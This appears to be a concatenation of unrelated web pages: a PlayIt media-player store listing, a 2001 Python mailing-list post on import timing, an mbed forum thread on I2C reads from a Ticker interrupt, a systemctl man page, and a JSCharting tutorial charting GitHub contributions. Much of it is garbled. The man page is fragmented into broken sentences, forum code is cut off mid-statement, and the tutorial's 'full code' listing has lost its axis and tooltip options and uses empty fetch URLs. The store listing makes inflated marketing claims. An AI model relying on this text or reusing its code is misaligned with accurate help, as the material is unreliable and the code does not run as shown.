function pull (repo) { var base = '' return fetch(`${base}/repos/${repo}/stats/commit_activity`) .then(response => response.json()) .then(weeks => weeks .map((week, i) => ({ x: moment().subtract(52 - i, 'weeks').toDate(), y: [ Math.min(...week.days), Math.max(...week.days) ] })) ) .catch(error => []) .then(points => ({ name: repo, points: points })) } We could also extract the chart-rendering part into another method, named comparisonChart. The big difference here is that instead of rendering a chart with data points for a single repository we’ll take a repositories list and map that into several area range series. As many as the consumer dictates! function comparisonChart (repositories) { var options = { targetElement: 'chart', type: 'areaSpline', legendPosition: 'CA:4,4', titleLabelText: 'Weekly GitHub Contribution Activity Comparison', titlePosition: 'full',: repositories.map(repo => ({ name: `Contributions to ${repo.name}`, points: repo.points })) } var chart = new JSC.Chart(options) } To use these two methods, we just have to map repositories into pull promises and then render the comparisonChart when all of those promises are settled. Promise .all([ 'nodejs/node', 'lodash/lodash', 'facebook/react', 'angular/angular' ].map(pull)) .then(comparisonChart) All of the above ends up producing a chart like the one in the screenshot below. If you ask me, that’s a lot of data density right there! You can use it to quickly compare the contributions over time on each of those repos, and it’s very easy to swap out repositories for your own or any other repositories you want. Naturally, that’s not all you can do with JSCharting. Another interesting feature example might be their automatic scale breaks, where you can have the chart join together two distant parts of a scale when there are no data points in between. In terms of coming up with use cases for this review, though, it might be much more interesting to work with their recently released mapping features – as in, Geography. I figured I’m from Argentina just like the Pope, who is visiting the US this month, so what’s a better excuse to render some data onto a map? Tweets and the Pope I used a Node.js script to pull together a series of geo-located tweets about the Pope in Washington, DC and surrounding areas. Putting that script together was actually the hard part, it turns out. Before showing you the full code listing, – detailing how to pull tweets about the Pope in a particular geocoded area from the Twitter Search API – there’s a few things worth mentioning about the code, so I’ll go bit by bit before showing you the full thing. I decided to use the twit module from npm as it solves authentication through OAuth on my behalf. We can install it via npm i twit on the command line. import Twit from 'twit' I created an application (create your own in here) for my demo and pasted all keys and secrets here. Note that you should never ever do that in a real-world application. You should guard your secrets passionately and fiercely. Maybe in a non-versioned file, an encrypted file only you know how to crack open, or in a secure storage service like Amazon S3. // note: never expose your authentication' }) I pulled the geolocation information from Google Maps just by typing in Washington DC and copying the coordinates from the URL bar. To pull a page of tweets you can use the t client we created earlier. The 500km indicate a proximity radius that we want to allow in our Twitter search query. We’ll get to the pager callback in a minute. 
var query = 'pope francis washington' var geocode = '38.8993488,-77.0145665,500km' var parameters = { geocode, q: query, count: 100 } t.get('search/tweets', parameters, pager) That would mostly work, except it’s too few tweets. It turns out Twitter doesn’t even reliably yield geolocated tweets when we ask for tweets in a certain geolocation, so we need to filter those out and into a list. function pager (err, payload) { if (err) { done(err) return } tweets.push(...payload.statuses.filter(status => status.geo)) } Since we can’t even reliably get 100 points, we’ll tell Twitter to give us a few pages worth of results, all of which we’ll filter out. To do that we can pull the code from earlier that did t.get('search/tweets', ...) into a more method and call it a bunch of times in a row. if (payload.search_metadata.next_results && pages++ < 10) { more(payload.search_metadata) // get the next page of results } else { done(null, tweets) // enough tweets for us! } We’ll use the search_metadata to figure out the newest tweet our next query can produce, effectively paging. We can use omnibox to transform search_metadata.next_results into a query string hash object. Here’s how the full code ended up looking. function tweetsAboutPope (done) { // note: never expose your application' }) var pages = 0 var query = 'pope francis washington' var geocode = '38.6743001,-76.2242026,500km' // Washington, DC and surrounding areas more() function more (metadata) { var parameters = { geocode, q: query, count: 100, // pick up where the last page left off max_id: metadata ? querystring(metadata.next_results.slice(1)).max_id : '' } t.get('search/tweets', parameters, pager) } function pager (err, payload) { if (err) { done(err) return } // even when you asked for geolocated tweets, not every tweet has geolocation data tweets.push(...payload.statuses.filter(status => status.geo)) if (payload.search_metadata.next_results && pages++ < 10) { more(payload.search_metadata) // pull a few pages worth of tweets } else { done(null, tweets) } } } Once that was set up I used it to pull a few tweets from Twitter. You can find them in this Gist. I then set up a server that serves tweets about the Pope from an /tweets-about-pope endpoint, because browsers don’t play all that well with the Twitter API. Rendering the chart wasn’t anywhere near as dramatic. First off there’s the request to pull the tweets from my server. fetch('/tweets-about-pope') .then(response => response.json()) .then(tweets => { // render chart here }) Now that I had I could render the map-flavored chart. We’ve already covered pretty much every option the example below passes into new JSC.Chart(options), so I’ll just place the “entire” map rendering code here. Two of the series are used to render parts of the map, the north-east region of the US, and the south region of the US. For each tweet I went with marker points in a series that also displays the tweets themselves when hovering over the tweets with your mouse. 
var options = { targetElement: 'chart', type: 'map', titleLabelText: 'Tweets About the Pope in Washington and Surrounding Areas', legendPosition: 'CA:4,4', series: [{ map: 'us.region:Northeast', name: 'US north-east' }, { map: 'us.region:South', name: 'US south' }, { type: 'marker', name: 'Tweet', defaultPointTooltip: '%text <br/>— <em>%when</em> by <strong>@%username</strong>', points: tweets.map(tweet => ({ x: tweet.geo.coordinates[1], y: tweet.geo.coordinates[0], attributes: { when: moment(new Date(tweet.created_at)).fromNow(), text: tweet.text, username: tweet.user.screen_name } })) }] } var chart = new JSC.Chart(options) The final result is a map of the south-eastern continental US and locations where tweets about the Pope had originated. You can find the full code for these examples and everything you’ll need to run them yourself over at bevacqua/jscharting on GitHub. Conclusions JSCharting is a great product if you want to add visualizations to your enterprise solutions but you don’t want spend a lot of time wrestling with SVG. While other tools like d3 are more comprehensive and let you do all the things, they may be too complicated if all you want is to render some data points on a chart or a map. The declarative approach used by the JSCharting library empowers you do do just that, without necessarily having to worry about how SVG works under the hood. In this sense, JSCharting is to SVG as Grunt is to build automation scripts. Drawing charts is really easy and mostly a matter of picking the right properties – you don’t need a deep understanding of the kind of chart you want to draw in order to draw it, and I think that’s huge. Lastly, if you’re in doubt about the kinds of things you can do with it, you should take a look at their documentation. It’s pretty extensive and it has a ton of examples with all the different kinds of charts and maps that you can render with JSCharting just by declaring some data points and a few other configuration options as we explored in this article.
https://laptrinhx.com/using-the-javascript-charting-library-31218354/
CC-MAIN-2020-40
refinedweb
3,693
63.59
C# is an object-oriented programming language. For example, let us consider a Rectangle object. It has attributes such as length and width. Depending upon the design, it may need ways for accepting the values of these attributes, calculating the area, and displaying details. Let us look at an implementation of a Rectangle class and discuss C# basic syntax: using System; namespace RectangleApplication { class Rectangle { // member variables double length; double width; public void Acceptdetails() { length = 4.5; width = 3.5; } public double GetArea() { return length * width; } public void Display() { Console.WriteLine("Length: {0}", length); Console.WriteLine("Width: {0}", width); Console.WriteLine("Area: {0}", GetArea()); } } class ExecuteRectangle { static void Main(string[] args) { Rectangle r = new Rectangle(); r.Acceptdetails(); r.Display(); Console.ReadLine(); } } } The ExecuteRectangle class contains the Main() method and instantiates the Rectangle class. Identifiers An identifier is a name used to identify a class, variable, function, or any other user-defined item. The basic rules for naming identifiers in C# are as follows: - A name must begin with a letter that could be followed by a sequence of letters, digits (0 - 9) or underscore. The first character in an identifier cannot be a digit. - It must not contain any embedded space or symbol such as ? - + ! @ # % ^ & * ( ) [ ] { } . ; : " ' / and \. However, an underscore ( _ ) can be used. - It should not be a C# reserved keyword. Identifiers that have special meaning only in a particular context are called contextual keywords. The following table lists the reserved keywords and contextual keywords in C#:
http://blogs.binarytitans.com/2017/04/c-basic-syntax.html
CC-MAIN-2018-13
refinedweb
224
50.43
#ifndef _MCHECK_H #define _MCHECK_H #include <features.h> __BEGIN_DECLS /* Return values for `mprobe': these are the kinds of inconsistencies that `mcheck' enables detection of. */ enum mcheck_status { MCHECK_DISABLED = 1, /* Consistency checking is not turned on. */ MCHECK_OK, /* Block is fine. */ MCHECK_FREE, /* Block freed twice. */ MCHECK_HEAD, /* Memory before the block was clobbered. */ MCHECK_TAIL /* Memory after the block was clobbered. */ }; /* Activate a standard collection of debugging hooks. This must be called before `malloc' is ever called. ABORTFUNC is called with an error code (see enum above) when an inconsistency is detected. If ABORTFUNC is null, the standard function prints on stderr and then calls `abort'. */ extern int mcheck (void (*__abortfunc) (enum mcheck_status)) __THROW; /* Similar to `mcheck' but performs checks for all blocks whenever one of the memory handling functions is called. This can be very slow. */ extern int mcheck_pedantic (void (*__abortfunc) (enum mcheck_status)) __THROW; /* Force check of all blocks now. */ extern void mcheck_check_all (void); /* Check for aberrations in a particular malloc'd block. You must have called `mcheck' already. These are the same checks that `mcheck' does when you free or reallocate a block. */ extern enum mcheck_status mprobe (void *__ptr) __THROW; /* Activate a standard collection of tracing hooks. */ extern void mtrace (void) __THROW; extern void muntrace (void) __THROW; __END_DECLS #endif /* mcheck.h */
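The header above only declares the interface; the following is a small illustrative sketch (not part of the header itself) of how mcheck() and mprobe() are typically used together. The message printed by the reporting hook is an assumption, and on recent glibc versions the checking machinery may additionally need to be preloaded (for example via libc_malloc_debug), so treat this as a sketch rather than a guaranteed recipe.

#include <mcheck.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Custom hook: report the inconsistency instead of aborting. */
static void report(enum mcheck_status status)
{
    fprintf(stderr, "mcheck: heap inconsistency detected (status %d)\n", (int) status);
}

int main(void)
{
    /* Must be installed before the first call to malloc(). */
    if (mcheck(report) != 0) {
        fprintf(stderr, "mcheck could not be activated\n");
        return 1;
    }

    char *buf = malloc(16);
    if (buf == NULL)
        return 1;
    strcpy(buf, "hello");

    printf("before overflow: %d\n", (int) mprobe(buf)); /* expect MCHECK_OK */

    buf[16] = 'X'; /* clobber the byte just past the block */

    printf("after overflow: %d\n", (int) mprobe(buf));  /* expect MCHECK_TAIL; report() also fires */

    free(buf); /* free() performs the same check and calls report() again */
    return 0;
}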
https://www.coursehero.com/file/5782043/mcheck/
CC-MAIN-2017-26
refinedweb
249
68.67
As2 flash pop window size. My occupation: I like music and my expertise is in music, writing songs to entertain the community around me. I take xml from 1 website. But those sizes are for retail. But I will sell wholesale. So can you change this? Example: 38 size -2, 40 size -3, 42 size -5, 44 size -0. It has to write 38-40-42 2 serial. to add pop up banner image in homepage wordpress Create Widget activation flowing Button & popup need to be responsive & presentable. Widget Module needs to be a responsive design. we need three pages designed for a website. there are in total three / four pages that will need designing; images will be provided. no milestone payment will be made without seeing the demo htmls. someone to complete a project for me that requires you to compute the EWMA and Rolling Window of selected data. Need work started ASAP and completed within 6 hours.). [login to view URL] design/apply (e) push and pop stack structure to properly associate hierarchical objects to build gestures for 2D transformation. [login to view URL] design multiple custom (f) function/method blocks to add a unique movement... import search filter large json file . search edit export data in many ways xls pdf etc.. will provide sample of small file and example data inside it once we discuss. winner of this project who places best bid . thanks The filter response is given as H(e^jw) = {3, -1}; plot the response. to build up an app used to remind people when they cross certain areas: if they previously liked a place and put it in their favorites, it shows it to them again when they visit the same place... like restaurants, gardens and play zone areas. Hi, I do want to make all product pictures have the same dimensions. The pictures are already uploaded on my website, in WP. large advert designing sick of designers on here saying they can do it then asking for inspiration and then copying exactly what I sent them; that's not a designer, that's a copier. Need standard A4 both pages with a 5mm bleed I have a logo and need it put onto a mock window type setup, should be pretty self evident . i have attached an example .
https://www.my.freelancer.com/job-search/as2-flash-pop-window-size/
CC-MAIN-2018-43
refinedweb
379
73.98
These are chat archives for opal/opal processthat takes s expression. You can get this sexp from Parser#parse s(:top, parsed_sexp) Kernel#evalfor dynamic source code. If your code is static, just require a compiled version. If you code is dynamic - then its AST is also dynamic and you can't partially pre-compile it. Most probably I'm missing something :smile: it "will run this test in opal", :opal => true do expect(true).to be_truthy end it "does some fun isomorphic stuff", :js => true do mount_component "Price", job: my_job = FactoryGirl.create(:job, :valid_job) do class Price < React::Component::Base ... modify internal behavior of price for testing end end find(".the-price").text.should eq(my_job.price) end describecalls, etc. with RUBY_ENGINE guards require 'spec_helper' describe 'chat component', :js => true, group: 2 do before(:each) do @agents_online = 0 stub_request(:get, "support.catprint.com/customer/agent_online_check"). to_return { {body: "{\"online_agents\":#{@agents_online},\"routing_agents\":#{@agents_online}}"} } FactoryGirl.create :production_center, domain: "127.0.0.1", code: "US" end it "switches from offline to online" do mount("Chat", online_text: "ONLINE", offline_text: "OFFLINE") do class Components::Chat < React::Component::Base POLL_INTERVAL = 1 # override default of 5 minutes end end page.should have_content('OFFLINE') wait_for_ajax @agents_online = 2 Rails.cache.delete('desk_agents_online') page.should have_content('ONLINE') end eval? RE: eval... that is essentially what I am doing now... however the problem is if you have code like this: mount_component "Foo" do puts "hello" end the block.source for the do, includes the line "mount_component" which we don't want so I just use the AST tree to get the actual block def mount_component; yield; endsomewhere else that wasn't dynamic
https://gitter.im/opal/opal/archives/2016/04/18
CC-MAIN-2019-22
refinedweb
271
50.33
krb5_introduction man page. krb5_introduction — introduction to the Kerberos 5 API. Kerberos 5 API Overview: All functions are documented in manual pages. This section tries to give an overview of the major components used in the Kerberos library, and points to where to look for a specific function. Kerberos context A Kerberos context (krb5_context) holds all per-thread state. All global variables that are context specific are stored in this structure, including default encryption types, credential cache (for example, a ticket file), and default realms. The internals of the structure should never be accessed directly; functions exist for extracting information. See the manual page for krb5_init_context() for how to create a context, and the module Heimdal Kerberos 5 library for more information about the functions. Kerberos authentication context A Kerberos authentication context (krb5_auth_context) holds all context related to an authenticated connection, in a similar way to the Kerberos context that holds the context for the thread or process. The krb5_auth_context is used by various functions that are directly related to authentication between the server and client. Examples of data that this structure contains are various flags, addresses of client and server, port numbers, keyblocks (and subkeys), sequence numbers, replay cache, and checksum types. Kerberos principal The Kerberos principal is the structure that identifies a user or service in Kerberos. The structure that holds the principal is the krb5_principal. There are functions to extract the realm and elements of the principal, but most applications have no reason to inspect the content of the structure. There are several ways to create a principal (with different degrees of portability), and one way to free it. See also the page The principal handling functions for more information and also the module Heimdal Kerberos 5 principal functions. Credential cache A credential cache holds the tickets for a user. A given user can have several credential caches, one for each realm where the user has initial tickets (the first krbtgt). The credential cache data can be stored internally in different ways, each of them for different purposes. File credential (FILE) caches and process-based (KCM) caches are for permanent storage, while memory caches (MEMORY) are local caches for the local process. Caches are opened with krb5_cc_resolve() or created with krb5_cc_new_unique(). If the cache needs to be opened again (using krb5_cc_resolve()), krb5_cc_close() will close the handle, but not remove the cache. krb5_cc_destroy() will zero out the cache and remove it so it can no longer be referenced. See also The credential cache functions and Heimdal Kerberos 5 credential cache functions. Kerberos errors Kerberos errors are based on the com_err library. All error codes are 32-bit signed numbers; the first 24 bits define what subsystem the error originates from, and the last 8 bits select one of up to 255 error codes within that subsystem. Each error code has a fixed string associated with it. For example, the error code -1765328383 has the symbolic name KRB5KDC_ERR_NAME_EXP, and the associated error string "Client's entry in database has expired". This is a great improvement compared to just getting one of the unix error codes back. However, Heimdal has an extension to pass back customised error messages. Instead of getting "Key table entry not found", the user might get back "failed to find host/host.example.com@EXAMPLE.COM (kvno 3) in keytab /etc/krb5.keytab (des-cbc-crc)".
This improves the chance that the user find the cause of the error so you should use the customised error message whenever it's available. See also module Heimdal Kerberos 5 error reporting functions . Keytab management A keytab is a storage for locally stored keys. Heimdal includes keytab support for Kerberos 5 keytabs, Kerberos 4 srvtab, AFS-KeyFile's, and for storing keys in memory. Keytabs are used for servers and long-running services. See also The keytab handing functions and Heimdal Kerberos 5 keytab handling functions . Kerberos crypto Heimdal includes a implementation of the Kerberos crypto framework, all crypto operations. To create a crypto context call krb5_crypto_init(). See also module Heimdal Kerberos 5 cryptography functions . Walkthrough of a sample Kerberos 5 client This example contains parts of a sample TCP Kerberos 5 clients, if you want a real working client, please look in appl/test directory in the Heimdal distribution. All Kerberos error-codes that are returned from kerberos functions in this program are passed to krb5_err, that will print a descriptive text of the error code and exit. Graphical programs can convert error-code to a human readable error-string with the krb5_get_error_message() function. Note that you should not use any Kerberos function before krb5_init_context() have completed successfully. That is the reason err() is used when krb5_init_context() fails. First the client needs to call krb5_init_context to initialise the Kerberos 5 library. This is only needed once per thread in the program. If the function returns a non-zero value it indicates that either the Kerberos implementation is failing or it's disabled on this host. #include <krb5.h> int main(int argc, char **argv) { krb5_context context; if (krb5_init_context(&context)) errx (1, "krb5_context"); Now the client wants to connect to the host at the other end. The preferred way of doing this is using getaddrinfo (for operating system that have this function implemented), since getaddrinfo is neutral to the address type and can use any protocol that is available. struct addrinfo *ai, *a; struct addrinfo hints; int error; memset (&hints, 0, sizeof(hints)); hints.ai_socktype = SOCK_STREAM; hints.ai_protocol = IPPROTO_TCP; error = getaddrinfo (hostname, "pop3", &hints, &ai); if (error) errx (1, "%s: %s", hostname, gai_strerror(error)); for (a = ai; a != NULL; a = a->ai_next) { int s; s = socket (a->ai_family, a->ai_socktype, a->ai_protocol); if (s < 0) continue; if (connect (s, a->ai_addr, a->ai_addrlen) < 0) { warn ("connect(%s)", hostname); close (s); continue; } freeaddrinfo (ai); ai = NULL; } if (ai) { freeaddrinfo (ai); errx ("failed to contact %s", hostname); }"); The client principal is not passed to krb5_sendauth() function, this causes the krb5_sendauth() function to try to figure it out itself. The server program is using the function krb5_recvauth() to receive the Kerberos 5 authenticator. In this case, mutual authentication will be tried. That means that the server will authenticate to the client. Using mutual authentication is required to avoid man-in-the-middle attacks, since it enables the user to verify that they are talking to the right server (a server that knows the key). If you are using a non-blocking socket you will need to do all work of krb5_sendauth() yourself. Basically you need to send over the authenticator from krb5_mk_req() and, in case of mutual authentication, verifying the result from the server with krb5_rd_rep(). 
status = krb5_sendauth (context, &auth_context, &sock, VERSION, NULL, server, AP_OPTS_MUTUAL_REQUIRED, NULL, NULL, NULL, NULL, NULL, NULL); if (status) krb5_err (context, 1, status, "krb5_sendauth"); Once authentication has been performed, it is time to send some data. First we create a krb5_data structure, then we sign it with krb5_mk_safe() using the auth_context that contains the session key that was exchanged in the krb5_sendauth()/krb5_recvauth() authentication sequence. Validating a password in an application See the manual page for krb5_verify_user(). API differences to MIT Kerberos This section is somewhat disorganised, but so far there is no overall structure to the differences, though some of them have their root in the fact that Heimdal uses an ASN.1 compiler and MIT doesn't. Principal and realms Heimdal stores the realm as a krb5_realm, that is, a char *. MIT Kerberos uses a krb5_data to store a realm. In Heimdal krb5_principal doesn't contain the component name_type; it's instead stored in the component name.name_type. To get and set the nametype in Heimdal, use krb5_principal_get_type() and krb5_principal_set_type(). For more information about principals and realms, see krb5_principal. Error messages To get the error string, Heimdal uses krb5_get_error_message(). This is to return custom error messages (like "Can't find host/datan.example.com@CODE.COM in /etc/krb5.conf." instead of the "Key table entry not found" that error_message returns). Heimdal uses a threadsafe(r) version of the com_err interface; the global com_err table isn't initialised. Then error_message returns quite a boring error string (just the error code itself).
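To make the error-message discussion above concrete, here is a small, hedged sketch (not part of the original manual page) of how a client might report failures using krb5_get_error_message() rather than the plain com_err string; the specific call that fails here, krb5_cc_default(), is just an illustrative choice.

#include <krb5.h>
#include <stdio.h>

/* Print the richer Heimdal/MIT error text for a failed call. */
static void report_krb5_error(krb5_context context, krb5_error_code code, const char *what)
{
    const char *msg = krb5_get_error_message(context, code);
    fprintf(stderr, "%s: %s\n", what, msg);
    krb5_free_error_message(context, msg);
}

int main(void)
{
    krb5_context context;
    krb5_error_code ret;
    krb5_ccache id;

    if (krb5_init_context(&context))
        return 1; /* no context yet, so nothing to look the error up in */

    ret = krb5_cc_default(context, &id); /* any failing call is handled the same way */
    if (ret) {
        report_krb5_error(context, ret, "krb5_cc_default");
        krb5_free_context(context);
        return 1;
    }

    krb5_cc_close(context, id);
    krb5_free_context(context);
    return 0;
}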
https://www.mankier.com/3/krb5_introduction
CC-MAIN-2017-34
refinedweb
1,336
54.63
#include <db.h> int DB_ENV->log_get_config(DB_ENV *dbenv, u_int32_t which, int *onoffp); The DB_ENV->log_get_config() method returns whether the specified which parameter is currently set or not. You can manage this value using the DB_ENV->log_set_config() method. The DB_ENV->log_get_config() method may be called at any time during the life of the application. The DB_ENV->log_get_config() method returns a non-zero error value on failure and 0 on success. The which parameter is the message value for which configuration is being checked. Must be set to one of the following values: System buffering is turned off for Berkeley DB log files to avoid double caching. Berkeley DB is configured to flush log writes to the backing disk before returning from the write system call, rather than flushing log writes explicitly in a separate system call, as necessary. Berkeley DB automatically removes log files that are no longer needed. Transaction logs are maintained in memory rather than on disk. This means that transactions exhibit the ACI (atomicity, consistency, and isolation) properties, but not D (durability). All pages of a log file are zeroed when that log file is created.
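A brief, hedged sketch of calling this method from C follows; the flag constant DB_LOG_AUTO_REMOVE and the environment setup are illustrative assumptions drawn from the wider Berkeley DB API rather than from the page above.

#include <db.h>
#include <stdio.h>

int main(void)
{
    DB_ENV *dbenv;
    int onoff, ret;

    if ((ret = db_env_create(&dbenv, 0)) != 0) {
        fprintf(stderr, "db_env_create: %s\n", db_strerror(ret));
        return 1;
    }

    /* Ask whether automatic removal of old log files is currently enabled. */
    ret = dbenv->log_get_config(dbenv, DB_LOG_AUTO_REMOVE, &onoff);
    if (ret != 0)
        fprintf(stderr, "log_get_config: %s\n", db_strerror(ret));
    else
        printf("DB_LOG_AUTO_REMOVE is %s\n", onoff ? "on" : "off");

    dbenv->close(dbenv, 0);
    return ret == 0 ? 0 : 1;
}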
http://docs.oracle.com/cd/E17276_01/html/api_reference/C/envlog_get_config.html
CC-MAIN-2015-27
refinedweb
188
54.83
Feb 8, 2006, at 4:29 PM, William S Fulton wrote: >. Thanks, William. >. Ah... very true. Good idea. Thanks again, -Dave Dave Dribin wrote: > On Feb 5, 2006, at 12:37 PM, William S Fulton wrote: >> A second release candidate for SWIG-1.3.28 is online at >> >> >> > > I'm having issues with regard to bug #1386576: > > STL vector of object pointers does not work for C# >? > func=detail&atid=101645&aid=1386576&group_id=1645 > > This has been closed, but I'm still unsure why I need to use > SWIG_STD_VECTOR_SPECIALIZE just for C#. The same SWIG interface file > is being used for Ruby and Python, and both of these modules handle > vector of pointers correctly without any macros. I shouldn't need to > have #ifdef SWIGCSHARP littered throughout my code. This should just > be handled by SWIG. Using partial template specialization, as I > pointed out in the bug report makes this issue transparent to the > users. I'm not so sure this bug report should be closed until it "just > works", as it does for the other modules. William, you mentioned that > namespaces don't work with partial template specialization. I'm not > sure I fully understand why partial template specialization doesn't > work with namespaces. Can't the partial template specialization be > included for non-template users, and the just require template users to > use SWIG_STD_VECTOR_SPECIALIZE? At least this will work for > std::vector until the better solution is implemented at some point. > You only need to use SWIG_STD_VECTOR_SPECIALIZE if the C# proxy name is not the same as the fully qualified C++ class name, eg %inline %{ namespace Space { class Foo { }; } %} %template(VectorFoo) std::vector<Space::Foo>; In this case, in the C# code, 'Space::Foo' will be emitted instead of 'Foo'. The specialization works around this problem. The problem was the same one if using %template(VectorBar) std::vector<Bar *>; as 'Bar *' was emitted into the C# code instead of just Bar. The correct longer term fix is to invent some new special variables to translate the C++ type into the C# type, where these types are template parameters. The other language modules don't suffer from the problem because they don't extend the proxy vector class with pure managed (target language) code using the templated type - see the cscode typemap code in std_vector.i. If the C# vector wrappers were made to look more like a simple wrapper of the std::vector class, rather than like a C# System.Collections.ArrayList, then this problem would not occur.. William Taro Sato wrote: > I know passing local variables across different typemaps is not > generally recommended, but I think I really need it sometimes to make > a clean interface for python. In short, suppose I have a local > variable (say local_n here) defined in typemap like this: > > %typemap(in) int x (int local_n) { > ... > local_n = 3; > ... > } > > When can we DEFINITELY expect local_n$argnum to be already assigned a > value (i.e., 3)? If we have a C function defined like this > > int f(int a, int x, int c); > > and want to hook typemapping a ALL the arguments, can we always expect > local_n$argnum = 3 (where $argnum = 2 in the above function) to be > executed before we typemap the argument int c, while the argument int > a, the local variable local_n$argnum points to some memory location > but with an arbitrary int value? 
Looking at whatever_wrap.c generated > after running "swig -python whatever.i" seems to suggest the argument > wrapping codes are inserted to _wrap.c exactly in order the arguments > are defined in a C function, so my guess is YES; but the documentation > doesn't seem to say this ordering is guranteed. > > Here's an example... I have a C function with prototype: > > void repeat(int *b, int n, int *a, int m); > > What this function internally does is to take an array b with length > n, i.e., [b0, b1, ..., b_n], and generate another array a by repeating > b, such that a ends up looking like [b0, b1, ..., b_{n*m-1}]. > > (Note that this is not exactly the problem I have at hand in practice, > but it is for simplicity; the point is I have no option for redefining > the function prototype.) > > In python, I want to simply use the interface such that I only need to > have the list to provide for b and the number of repetition m: > >>>>result = repeat([1,2,3], 3) >>>>print result > [1, 2, 3, 1, 2, 3, 1, 2, 3] > > This is because I can get the length of the array b using PyList_Size; > the array a is for output, so I simply want to get it as a returned > value. > > For SWIG, I make typemaps like this: > > ------------------------------------------------------------------------------ > // repeat.i > %module repeat > > .... > > %typemap(in) (int *b, int n) (int local_n) { > ... > $2 = (int) PyList_Size($input); > local_n = $2; > ... > } > > %typemap(in) (int *a, int m) { > ... > length_of_a = m * local_n1; // I want to do this, but need to make > sure local_n > // is already > defined properly. > ... > } > > oid repeat(int *b, int n, int *a, int m); > > --------------------------------------------------------------------------------- > > so that when typemapping is done for array a, I can rely on local_n to > hold a size of array b. > There are no guarantees on the numbering. Rather than abuse the typemap system, because your types are not complete, I'd write a wrapper function instead or complete the type. Your types are not complete as your output array does not hold complete information about the array, that is the size of the array. The caller of repeat has to have apriori knowledge in order to use the function. So, build the knowledge into your wrapper, consider something like: typedef struct { int *a; int m; } array; array * repeat_wrapper(int *b, int n, int m) { array my_array; my_array.a = malloc(sizeof(int)*n*m); my_array.m = m; repeat(b, n, my_array.a, my_array.m); return a; } Then you can wrap repeat_wrapper instead and easily get all the information necessary for marshalling your C array into a python list and write an 'out' typemap for 'array *'. Alternatively complete the type if you can change the code you are wrapping. You could use a null terminated array, so that the size can be deduced. If you think about it, this is how char* strings work as they don't contain a size, strlen() will get it for you, by searching for the null termination. William Hi Marcelo I checked it and it works beautifully now. Thank you very much indeed+ Regards Andreas >Ok, it is solved now, but sourceforge.net CVS is down. > >Anyway, the fix will be to 1.3.28 before final release. > >Marceki > >andreas.held@... wrote: > >>Hi >> >>I recently run into the following problem where swig generated duplicate = symbols. Incidentally, this problem already existed in swig-1.3.27, as well= as in 1.3.28rc2. 
>> >>Consider the following file (test.i): >>%module(directors="1") test >>%feature("director"); >> >>%{ >> class A { >> public: >> A() {}; >> virtual ~A() {}; >> protected: >> virtual void draw() {}; >> }; >> >> class B : public A { >> public: >> B() {}; >> virtual ~B() {}; >> protected: >> void draw() {}; >> void draw(int arg1) {}; >> }; >> >>%} >> >> class A { >> public: >> A() {}; >> virtual ~A() {}; >> protected: >> virtual void draw() {}; >> }; >> >> class B : public A { >> public: >> B() {}; >> virtual ~B() {}; >> protected: >> void draw() {}; >> void draw(int arg1) {}; >> }; >> >>Compiling this with the command line: >>swig -module test -DPYTHON -python -c++ -shadow -modern -dirprot -O -o test_wrap.cpp test.i >> >>results in the symbol _wrap_B_draw__SWIG_0 defined twice. >>Before you flame me, the above code is not mine, but is part of the library I am trying to wrap. Hints and suggestions are most welcome. >> >>Regards >> >>Andreas Held >> >>_______________________________________________ >>Swig-user mailing list >>Swig-user@... >> On Wed, 08 Feb 2006 20:05:06 +0100, Marcelo Matus <mmatus@...> wrote: >!. Just for the record, I had a bug with swig 1.3.27 and msvc 2005 where the compiler complained about some missing operator < in the PySequence class. The 1.3.28rc2 release solved this. Mentioning it just in case somebody here posts about it later and uses an old swig. -Matthias P.S.: Thanks for reminding me about Valentine's Day, I almost forgot it... would probably have led to catastrophic consequences ;-)
> - Python simplified proxy classes, now swig doesn't need to generate the > additional 'ClassPtr' classes. > - Python backward compatibility improved, many projects that used to > work only with swig-1.3.21 to swig-1.3.24 are working again with > swig-1.3.28 > - Better runtime error reporting. > - Add the %catches directive to catch and dispatch exceptions. > - Add the %naturalval directive for more 'natural' variable wrapping. > - Add the %allowexcept and %exceptionvar directives to handle exceptions > when accesing a variable. > - Add the %delobject directive to mark methods that act like > destructors. > - Add/doc more debug options. > - Minor bug fixes and improvements to the Lua, Ruby, Java, C#, Python, > Guile, Chicken, Tcl and Perl modules. > > > > > ------------------------------------------------------- >@... >
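A minimal corrected sketch of the wrapper suggested in the reply may help here: as quoted, the snippet declares a stack-allocated struct and returns a variable named "a" that does not exist. The version below heap-allocates the struct, records the total element count (n*m) rather than just m so that an 'out' typemap has enough information to marshal the array, and assumes repeat() fills exactly n*m ints; the names are simply the ones used in the thread.

#include <stdlib.h>

/* the wrapped C function from the thread */
void repeat(int *b, int n, int *a, int m);

typedef struct {
    int *a;    /* output buffer                   */
    int  len;  /* total number of ints in a (n*m) */
} array;

array *repeat_wrapper(int *b, int n, int m)
{
    array *out = malloc(sizeof *out);         /* heap-allocate so it survives the return */
    out->len = n * m;
    out->a   = malloc(sizeof(int) * out->len);
    repeat(b, n, out->a, m);
    return out;                               /* the 'out' typemap (or caller) frees both */
}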
https://sourceforge.net/p/swig/mailman/swig-user/?viewmonth=200602&viewday=8
CC-MAIN-2017-43
refinedweb
1,743
64.71
The purpose of this code is to return a dictionary that lists the beginning index of a substring in a larger string.

Ex. matchUp(["a", "b", "c", "d"], "abc") would return: {"a":0, "b":1, "c":2, "d":-1} (with -1 being the default "not found" value)

The hint for this question is that the find function can tell you the beginning index for a substring in another string. This is the correct syntax, right? I have my array of characters in strArray, and y is the substring I am searching for.

def matchUp (strArray, word):
    index = {}
    for x in strArray:
        index[x] = -1
    for y in word:
        for x in index:
            if y in strArray:
                index[x] = strArray.find(y)
    return index

You need to call word.find, not strArray.find.

def matchUp (strArray, word):
    index = {}
    for ch in strArray:
        index[ch] = word.find(ch)  # <---
    return index

(No need to use a nested loop)

Usage example:

>>> matchUp(["a", "b", "c", "d"], "abc")
{'a': 0, 'c': 2, 'b': 1, 'd': -1}
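Since the accepted fix drops the nested loop entirely, the same behaviour can also be written as a one-line dict comprehension; this is only an alternative sketch of the answer above, using the same example inputs.

def matchUp(strArray, word):
    # str.find returns -1 when the character is absent, which doubles as
    # the "not found" default the question asks for
    return {ch: word.find(ch) for ch in strArray}

print(matchUp(["a", "b", "c", "d"], "abc"))   # {'a': 0, 'b': 1, 'c': 2, 'd': -1}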
https://codedump.io/share/1BUjdpnPdA3O/1/simple-python-27-code-has-some-kind-of-issue-quot39list39-object-has-no-attribute-39find39quot
CC-MAIN-2017-13
refinedweb
169
79.4
